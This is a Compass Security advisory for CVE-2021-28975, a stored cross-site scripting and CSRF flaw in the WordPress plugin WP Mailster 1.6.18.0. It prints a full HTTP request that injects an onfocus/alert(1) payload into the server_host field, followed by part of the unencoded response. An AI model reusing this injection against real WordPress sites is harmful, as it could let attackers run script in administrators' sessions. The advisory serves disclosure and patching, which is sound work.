############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: WP Mailster [1] # Vendor: WP Mailster # CSNC ID: CSNC-2021-018 # CVE ID: CVE-2021-28975 # Subject: Cross-Site Scripting (XSS) [2] and Cross-Site Request Forgery (CSRF) [3] # Risk: High # Effect: Remotely exploitable # Author: Emanuele Barbeno (advisories@compass-security.com) # Date: 21.10.2021 # ############################################################# Introduction: ------------- Mailster is a mailing list plugin for WordPress. It enables you to offer automated electronic mailing lists. [4] Compass Security discovered a security flaw in WP Mailster plugin, which allows injecting client-side code into the WordPress admin panel. Furthermore, because the plugin fails to validate anti-CSRF tokens, the client-side code injection can be exploited remotely if an admin user with a valid session visits a malicious website on the Internet. Affected: --------- Vulnerable: * 1.6.18.0 Not Vulnerable: * 1.6.19.0 No other version was tested, but it is believed for the older versions to be vulnerable as well. Technical Description --------------------- The user's input data is not properly encoded when being echoed back to the user. Therefore, this data can be interpreted as executable code by the browser and allows an attacker to execute JavaScript code in the WordPress admin console in the context of the victim's browser if the victim opens a mail server's details in the mst_servers page whose the "server_host", the "server_name" or the "connection_parameter" parameters' values contain the XSS payload. The following HTTP request shows the injected XSS payload in the server_host input parameter: ``` POST /wordpress/wp-admin/admin.php?page=mst_servers&subpage=edit&sid=2 HTTP/1.1 Host: mydomain.local Content-Length: 226 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://mydomain.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4028.0 Safari/537.36 autochrome/red Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q= 0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://mydomain.local/wordpress/wpadmin/admin.php?page=mst_servers&subpage=edit&sid=1&_wpnonce=845ead6aa9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2WUVCRVbuty8 iHI7pYlC0KbouXa6BDhdoTuka%7Cb3c7728f6c07e8049c6e0e8a37a8035e698ed9ac6006993f93b8b4 eaf8a4667e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2W UVCRVbuty8iHI7pYlC0KbouXa6BDhdoTuka%7C114a4995e06b2a7d23d13d2b289559678f13bac0233b f9184ce4a033041254a4; wp-settings-time-1=1615562785; PHPSESSID=3ppf9hugcjhni5gnosc0u4nfeb Connection: close sid=2&server_type=0&server_name=&server_host=csnc"onfocus=alert(1);//"+autofocus=& server_port=&secure_protocol=&secure_authentication=0&protocol=pop3&connection_par ameter=&add_server=edit&sid=2&server_action=Update+Mail+Server ``` The HTTP response shows that the XSS payload is not encoded by the web application, thus the payload is evaluated and executed as JavaScript code by the browser: ``` HTTP/1.1 200 OK Date: Fri, 12 Mar 2021 15:36:19 GMT Server: Apache/2.4.46 (Debian) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wp-settings-1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; MaxAge=0; path=/wordpress/ Set-Cookie: wp-settings-time-1=1615563379; expires=Sat, 12-Mar-2022 15:36:19 GMT; Max-Age=31536000; path=/wordpress/ Vary: Accept-Encoding Content-Length: 35286 Connection: close Content-Type: text/html; charset=UTF-8 [CUT BY COMPASS]